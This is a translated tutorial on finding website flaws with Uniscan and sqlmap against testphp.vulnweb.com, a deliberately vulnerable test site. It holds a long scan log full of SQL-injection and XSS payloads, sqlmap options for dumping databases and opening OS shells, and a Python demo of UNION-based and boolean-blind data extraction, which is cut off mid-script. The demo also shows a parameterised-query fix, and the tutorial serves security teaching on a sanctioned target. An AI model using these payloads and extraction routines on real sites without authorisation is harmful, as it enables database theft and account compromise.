How to find vulnerabilities in websites

Finding vulnerabilities in websites is not complicated: with some technical knowledge of tools such as Uniscan and sqlmap, and of techniques such as SQL injection, you will be able to look for vulnerabilities in websites.

Based on this topic, I had the idea of writing this article to teach attack techniques that are widely used to find vulnerabilities in websites.


The techniques shown here are web attacks, and the tests are run mainly against vulnerable PHP sites. We will run them against "testphp.vulnweb.com", where we have full permission to perform this kind of test: the site was created for exactly that purpose, to challenge, teach and motivate information security professionals to find flaws in applications.

For this exploration, note that the Debian-based distribution "Kali Linux" is being used, together with two very useful tools that come pre-installed in Kali by default:
  • Uniscan: a web vulnerability scanner that looks for common flaws such as local file inclusion, remote command execution, remote file inclusion and SQL injection; it can also identify and enumerate web services, interesting files and directories, and server information.
  • sqlmap: an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It is very well known and is also widely abused by attackers to break into SQL databases.

    Uniscan – Web Application Penetration Testing Tool

    In the Kali terminal, type "uniscan --help"; it prints what each option does.
    root@Kali2018-4:~# uniscan --help
    ####################################
    #         Uniscan project          #
    # http://uniscan.sourceforge.net/  #
    ####################################
    V. 6.3
    OPTIONS:
    -h help
    -u <url> example: https://www.example.com/
    -f <file> list of url's
    -b Uniscan go to background
    -q Enable Directory checks
    -w Enable File checks
    -e Enable robots.txt and sitemap.xml check
    -d Enable Dynamic checks
    -s Enable Static checks
    -r Enable Stress checks
    -i <dork> Bing search
    -o <dork> Google search
    -g Web fingerprint
    -j Server fingerprint
    usage:
    [1] perl ./uniscan.pl -u http://www.example.com/ -qweds
    [2] perl ./uniscan.pl -f sites.txt -bqweds
    [3] perl ./uniscan.pl -i uniscan
    [4] perl ./uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
    [5] perl ./uniscan.pl -o "inurl:test"
    [6] perl ./uniscan.pl -u https://www.example.com/ -r

    Scanning the site with Uniscan

    Next, run "uniscan -u http://testphp.vulnweb.com/ -qweds" so the tool performs a full check of the application: -q directory checks, -w file checks, -e robots.txt and sitemap.xml, -d dynamic checks and -s static checks. This is the scan that shows where the site is vulnerable.

    root@Kali2018-4:~# uniscan -u http://testphp.vulnweb.com/ -qweds
    ####################################
    #         Uniscan project          #
    # http://uniscan.sourceforge.net/  #
    ####################################
    V. 6.3
    Scan date: 10-2-2020 20:45:18
    ===================================================================================================
    | Domain: http://testphp.vulnweb.com/
    | Server: nginx/1.4.1
    | IP: 176.28.50.165
    ===================================================================================================
    |
    | Directory check:
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/Flash/
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/admin/
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/images/
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/pictures/
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/secured/
    ===================================================================================================
    |
    | File check:
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/CVS/Entries
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/favicon.ico
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/index.php
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/login.php
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/search.php
    | [+] CODE: 200 URL: http://testphp.vulnweb.com/userinfo.php?uid=1;
    ===================================================================================================
    |
    | Check robots.txt:
    |
    | Check sitemap.xml:
    ===================================================================================================
    |
    | Crawler Started:
    | Plugin name: E-mail Detection v.1.1 Loaded.
    | Plugin name: Upload Form Detect v.1.1 Loaded.
    | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
    | Plugin name: External Host Detect v.1.2 Loaded.
    | Plugin name: phpinfo() Disclosure v.1 Loaded.
    | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
    | Plugin name: Code Disclosure v.1.1 Loaded.
    | Plugin name: FCKeditor upload test v.1 Loaded.
    | [+] Crawling finished, 87 URL's found!
    |
    | E-mails:
    | [+] E-mail Found: wvs@acunetix.com
    |
    | File Upload Forms:
    |
    | Timthumb:
    |
    | External hosts:
    | [+] External Host Found: http://www.eclectasy.com
    | [+] External Host Found: http://www.acunetix.com
    | [+] External Host Found: https://www.acunetix.com
    | [+] External Host Found: http://blog.mindedsecurity.com
    |
    | PHPinfo() Disclosure:
    |
    | Web Backdoors:
    |
    | Source Code Disclosure:
    | [+] Source Code Found: http://testphp.vulnweb.com/pictures/wp-config.bak
    |
    | FCKeditor File Upload:
    |
    | Ignored Files:
    | http://testphp.vulnweb.com/Flash/add.fla
    | http://testphp.vulnweb.com/admin/create.sql
    ===================================================================================================
    | Dynamic tests:
    | Plugin name: Learning New Directories v.1.2 Loaded.
    | Plugin name: FCKedior tests v.1.1 Loaded.
    | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
    | Plugin name: Find Backup Files v.1.2 Loaded.
    | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
    | Plugin name: Local File Include tests v.1.1 Loaded.
    | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
    | Plugin name: Remote Command Execution tests v.1.1 Loaded.
    | Plugin name: Remote File Include tests v.1.2 Loaded.
    | Plugin name: SQL-injection tests v.1.2 Loaded.
    | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
    | Plugin name: Web Shell Finder v.1.3 Loaded.
    | [+] 4 New directories added
    |
    |
    | FCKeditor tests:
    | Timthumb < 1.33 vulnerability:
    | Backup Files:
    | Blind SQL Injection:
    | Local File Include:
    | PHP CGI Argument Injection:
    | Remote Command Execution:
    | Remote File Include:
    | SQL Injection:
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
    [*] Remaining tests: 96
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
    [*] Remaining tests: 95
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2'
    [*] Remaining tests: 94
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2"
    [*] Remaining tests: 93
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3'
    [*] Remaining tests: 92
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3"
    [*] Remaining tests: 91
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4'
    [*] Remaining tests: 90
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4"
    [*] Remaining tests: 89
    [*] Remaining tests: 88
    [*] Remaining tests: 87
    [*] Remaining tests: 86
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
    [*] Remaining tests: 85
    [*] Remaining tests: 84
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1"
    [*] Remaining tests: 83
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2"
    [*] Remaining tests: 82
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2'
    [*] Remaining tests: 81
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3'
    [*] Remaining tests: 80
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3"
    | [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    | Cross-Site Scripting (XSS):
    | [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
    | [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><IMG SRC="javascript:alert('XSS');">
    [*] Remaining tests: 283
    [*] Remaining tests: 282
    | [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    [*] Remaining tests: 281
    [*] Remaining tests: 280
    | [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    [*] Remaining tests: 279
    [*] Remaining tests: 278
    | [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
    [*] Remaining tests: 277
    [*] Remaining tests: 276
    | [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><body onload="javascript:alert('XSS')"></body> 
    [*] Remaining tests: 275
    [*] Remaining tests: 274
    | [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><table background="javascript:alert('XSS')"></table>
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 163
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=<IMG SRC="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=<body onload="javascript:alert('XSS')"></body>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=<table background="javascript:alert('XSS')"></table>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<script>alert('XSS')</script>&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<IMG SRC="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 136
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uemail=123&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 135
    [*] Remaining tests: 134
    [*] Remaining tests: 133
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<body onload="javascript:alert('XSS')"></body>&uemail=123&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 132
    [*] Remaining tests: 131
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<table background="javascript:alert('XSS')"></table>&uemail=123&uphone=123&signup=123&uaddress=123 
    [*] Remaining tests: 130
    [*] Remaining tests: 129
    [*] Remaining tests: 128
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<script>alert('XSS')</script>&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 127
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<IMG SRC="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 126
    [*] Remaining tests: 125
    [*] Remaining tests: 124
    [*] Remaining tests: 123
    [*] Remaining tests: 122
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 121
    [*] Remaining tests: 119
    [*] Remaining tests: 119
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 118
    [*] Remaining tests: 117
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 116
    [*] Remaining tests: 115
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<body onload="javascript:alert('XSS')"></body>&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 114
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<table background="javascript:alert('XSS')"></table>&uphone=123&signup=123&uaddress=123
    [*] Remaining tests: 113
    [*] Remaining tests: 112
    [*] Remaining tests: 111
    [*] Remaining tests: 110
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<script>alert('XSS')</script>&signup=123&uaddress=123
    [*] Remaining tests: 109
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<IMG SRC="javascript:alert('XSS');">&signup=123&uaddress=123
    [*] Remaining tests: 108
    [*] Remaining tests: 107
    [*] Remaining tests: 106
    [*] Remaining tests: 105
    [*] Remaining tests: 104
    [*] Remaining tests: 103
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&signup=123&uaddress=123
    [*] Remaining tests: 102
    [*] Remaining tests: 101
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&signup=123&uaddress=123
    [*] Remaining tests: 100
    [*] Remaining tests: 99
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&signup=123&uaddress=123
    [*] Remaining tests: 98
    [*] Remaining tests: 97
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<body onload="javascript:alert('XSS')"></body>&signup=123&uaddress=123
    [*] Remaining tests: 96
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<table background="javascript:alert('XSS')"></table>&signup=123&uaddress=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<script>alert('XSS')</script>
    [*] Remaining tests: 73
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<IMG SRC="javascript:alert('XSS');">
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    [*] Remaining tests: 65
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<body onload="javascript:alert('XSS')"></body>
    | [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
    | Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<table background="javascript:alert('XSS')"></table>
    | [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
    | Post data: &searchFor=<IMG SRC="javascript:alert('XSS');">&goButton=123
    [*] Remaining tests: 54
    | [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
    | Post data: &searchFor=<script>alert('XSS')</script>&goButton=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
    | Post data: &searchFor=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&goButton=123
    [*] Remaining tests: 47
    | [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
    | Post data: &searchFor=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&goButton=123
    [*] Remaining tests: 46
    [*] Remaining tests: 45
    | [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
    | Post data: &searchFor=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&goButton=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
    | Post data: &searchFor=<body onload="javascript:alert('XSS')"></body>&goButton=123
    | [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
    | Post data: &searchFor=<table background="javascript:alert('XSS')"></table>&goButton=123
    | Web Shell Finder:
    ===================================================================================================
    | Static tests:
    | Plugin name: Local File Include tests v.1.1 Loaded.
    | Plugin name: Remote Command Execution tests v.1.1 Loaded.
    | Plugin name: Remote File Include tests v.1.1 Loaded.
    |
    |
    | Local File Include:
    | Remote Command Execution:
    | Remote File Include:

    ===================================================================================================
    Scan end date: 11-2-2020 0:59:55
    HTML report saved in: report/testphp.vulnweb.com.html
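    The scan prints one line per payload that triggered, so the same injection point on listproducts.php?cat appears eight times and secured/newuser.php dozens of times. Before handing anything to sqlmap or to developers, collapse the hits to one entry per (vulnerability type, HTTP method, path, injected parameter). The script below is an added example written for this article, not part of Uniscan; it parses Uniscan's report lines ("| [+] Vul [TYPE] URL", an optional "| Post data: ..." line under it, and "| [+] Source Code Found: URL") and its SAMPLE_SCAN input is a constructed excerpt of the output shown above. Because Uniscan writes payloads unencoded, the injected parameter is recognised as the one whose value carries a quote or a "<".

```python
"""Triage Uniscan's dynamic-test output.

Added example for this article, not part of Uniscan. It collapses the
repeated "[+] Vul" hits into one row per (type, method, path, parameter).
SAMPLE_SCAN is a constructed excerpt of the scan output shown above.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

SAMPLE_SCAN = """\
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
[*] Remaining tests: 96
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
| [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><IMG SRC="javascript:alert('XSS');">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<script>alert('XSS')</script>&goButton=123
| [+] Source Code Found: http://testphp.vulnweb.com/pictures/wp-config.bak
"""

VUL_RE = re.compile(r"^\|\s*\[\+\]\s*Vul\s*\[(?P<type>[^\]]+)\]\s*(?P<url>.+?)\s*$")
SRC_RE = re.compile(r"^\|\s*\[\+\]\s*Source Code Found:\s*(?P<url>\S+)")
POST_RE = re.compile(r"^\|\s*Post data:\s*(?P<body>.*)$")
PAYLOAD_CHARS = ("'", '"', "<")


def split_params(query: str):
    """Split 'a=1&b=2' into (name, value) pairs WITHOUT decoding, so the raw
    probe characters Uniscan injected stay visible."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((name, value))
    return pairs


def injected_params(pairs):
    """Parameters whose value carries a probe character (the injected ones)."""
    return [n for n, v in pairs if any(c in v for c in PAYLOAD_CHARS)]


def triage(lines):
    """Counter keyed by (type, method, path, param) -> number of payload hits."""
    findings = Counter()
    lines = list(lines)
    i = 0
    while i < len(lines):
        line = lines[i].rstrip("\n")
        i += 1
        m = SRC_RE.match(line)
        if m:
            findings[("Source Code Disclosure", "GET", urlsplit(m["url"]).path, "-")] += 1
            continue
        m = VUL_RE.match(line)
        if not m:
            continue  # progress lines such as '[*] Remaining tests: 96'
        parts = urlsplit(m["url"])
        method, pairs = "GET", split_params(parts.query)
        # A 'Post data:' line right after the hit means the payload went in the body.
        if i < len(lines):
            pm = POST_RE.match(lines[i])
            if pm:
                method, pairs = "POST", split_params(pm["body"])
                i += 1
        for param in injected_params(pairs) or ["?"]:
            findings[(m["type"], method, parts.path, param)] += 1
    return findings


def report(findings):
    """Human-readable rows, worst-first by hit count, then by path."""
    rows = sorted(findings.items(), key=lambda kv: (-kv[1], kv[0]))
    return [f"{t:<24} {meth:<4} {path:<28} {param:<10} hits={n}"
            for (t, meth, path, param), n in rows]


if __name__ == "__main__":
    print("\n".join(report(triage(SAMPLE_SCAN.splitlines()))))
```

    Run it on the saved report (uniscan writes an HTML copy, but the console output redirected to a file works too): seven distinct findings come out of the nine hits in the sample, and the full scan above collapses to well under twenty. Each row is then one manual check or one sqlmap target, which is how the next section picks listproducts.php?cat.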

    sqlmap commands

    Just as we used --help to find out what each Uniscan option does, we do the same with sqlmap. Type "sqlmap --help".

    root@Kali2018-4:~# sqlmap --help
            ___
           __H__
     ___ ___["]_____ ___ ___  {1.2.10#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [']_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    Usage: python sqlmap [options]
    Options:
    -h, --help Show basic help message and exit
    -hh Show advanced help message and exit
    --version Show program's version number and exit
    -v VERBOSE Verbosity level: 0-6 (default 1)
    Target:
    At least one of these options has to be provided to define the
    target(s)
    -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK Process Google dork results as target URLs
    Request:
    These options can be used to specify how to connect to the target URL
    --data=DATA Data string to be sent through POST
    --cookie=COOKIE HTTP Cookie header value
    --random-agent Use randomly selected HTTP User-Agent header value
    --proxy=PROXY Use a proxy to connect to the target URL
    --tor Use Tor anonymity network
    --check-tor Check to see if Tor is used properly
    Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER Testable parameter(s)
    --dbms=DBMS Force back-end DBMS to provided value
    Detection:
    These options can be used to customize the detection phase
    --level=LEVEL Level of tests to perform (1-5, default 1)
    --risk=RISK Risk of tests to perform (1-3, default 1)
    Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
    --technique=TECH SQL injection techniques to use (default "BEUSTQ")
    Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
    -a, --all Retrieve everything
    -b, --banner Retrieve DBMS banner
    --current-user Retrieve DBMS current user
    --current-db Retrieve DBMS current database
    --passwords Enumerate DBMS users password hashes
    --tables Enumerate DBMS database tables
    --columns Enumerate DBMS database table columns
    --schema Enumerate DBMS schema
    --dump Dump DBMS database table entries
    --dump-all Dump all DBMS databases tables entries
    -D DB DBMS database to enumerate
    -T TBL DBMS database table(s) to enumerate
    -C COL DBMS database table column(s) to enumerate
    Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-shell Prompt for an interactive operating system shell
    --os-pwn Prompt for an OOB shell, Meterpreter or VNC
    General:
    These options can be used to set some general working parameters
    --batch Never ask for user input, use the default behavior
    --flush-session Flush session files for current target
    Miscellaneous:
    --sqlmap-shell Prompt for an interactive sqlmap shell
    --wizard Simple wizard interface for beginner users
    [!] to see full list of options run with '-hh'

    After scanning the application, if it found any vulnerabilities, move on to the next step.
    Pick one of the vulnerable links Uniscan returned and work on it. In my case I'll take "http://testphp.vulnweb.com/listproducts.php?cat=1". Remember that the tool reported more than SQL injection: reflected XSS in hpp/?pp, secured/newuser.php and search.php, a source-code backup at pictures/wp-config.bak (the WordPress configuration file, which holds database credentials) and admin/create.sql in the ignored-files list, all of which deserve a look of their own. Here we will exploit the SQL injection it identified. Note that a scanner hit is a candidate, not proof: sqlmap's first run confirms it by sending its own true/false and error payloads before enumerating anything.
    With this vulnerability it is possible to collect information from the application's database and to manipulate its data.
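    To see why a single unvalidated parameter hands over the whole database, here is an added example, written for this article and not the source of testphp.vulnweb.com (which is not public). It rebuilds a cut-down version of the acuart schema from the sqlmap output in an in-memory SQLite database and reproduces, end to end, the vulnerable pattern (the cat value concatenated into the query), the three probes seen on this page (Uniscan's cat=1' error probe, sqlmap's boolean pair cat=1 AND 9252=9252, and a UNION into the result columns), the character-by-character extraction sqlmap falls back to for "boolean-based blind", and the parameterised query that fixes it. Assumptions: the products table has 3 columns here where sqlmap found 11; the users row is invented; SQLite's sqlite_master stands in for MySQL's information_schema.

```python
"""Anatomy of the listproducts.php?cat injection, rebuilt in SQLite.

Added example for this article, not the source of testphp.vulnweb.com.
Assumptions: a 3-column products table (sqlmap found 11 on the real
site), an invented users row, and sqlite_master in place of MySQL's
information_schema.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
CREATE TABLE users (uname TEXT, pass TEXT, email TEXT, cc TEXT);
INSERT INTO products VALUES (1, 1, 'Poster'), (2, 1, 'Mug'), (3, 2, 'Print');
INSERT INTO users VALUES ('test', 'test', 'test@example.invalid', '0000-0000-0000-0000');
""")


def list_products_vulnerable(cat: str):
    """The anti-pattern behind the finding: request input pasted into SQL text."""
    sql = "SELECT id, cat, name FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def list_products_safe(cat: str):
    """Fix: validate the type and bind the value; payload text never becomes SQL."""
    try:
        cat_id = int(cat)
    except ValueError:
        return []
    return conn.execute("SELECT id, cat, name FROM products WHERE cat=?", (cat_id,)).fetchall()


def quote_breaks_query() -> bool:
    """Uniscan's "cat=1'" probe: an unbalanced quote that raises a DB error shows
    the value reaches the SQL parser unescaped (error-based detection)."""
    try:
        list_products_vulnerable("1'")
    except sqlite3.OperationalError:
        return True
    return False


def boolean_blind_detected() -> bool:
    """sqlmap's pair: a true tautology keeps the page content, a false one empties it."""
    return list_products_vulnerable("1 AND 9252=9252") != list_products_vulnerable("1 AND 9252=9253")


def union_dump_users():
    """What --dump does once a UNION works: select another table into the same
    column slots (the real payload pads to 11 columns with NULL)."""
    return list_products_vulnerable("1 AND 1=0 UNION ALL SELECT uname, pass, cc FROM users-- ")


def oracle(condition: str) -> bool:
    """Blind primitive: does category 1 still render when `condition` is ANDed in?"""
    return len(list_products_vulnerable(f"1 AND ({condition})")) > 0


def blind_extract(expr: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction: binary search over the code point of each
    character, about 7 true/false requests per character, which is how sqlmap
    proceeds when no query output is reflected in the page."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {pos}"):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("quote error:", quote_breaks_query())
    print("boolean blind:", boolean_blind_detected())
    print("union dump:", union_dump_users())
    # the blind equivalents of --tables and --dump, one character at a time
    print("2nd table:", blind_extract(
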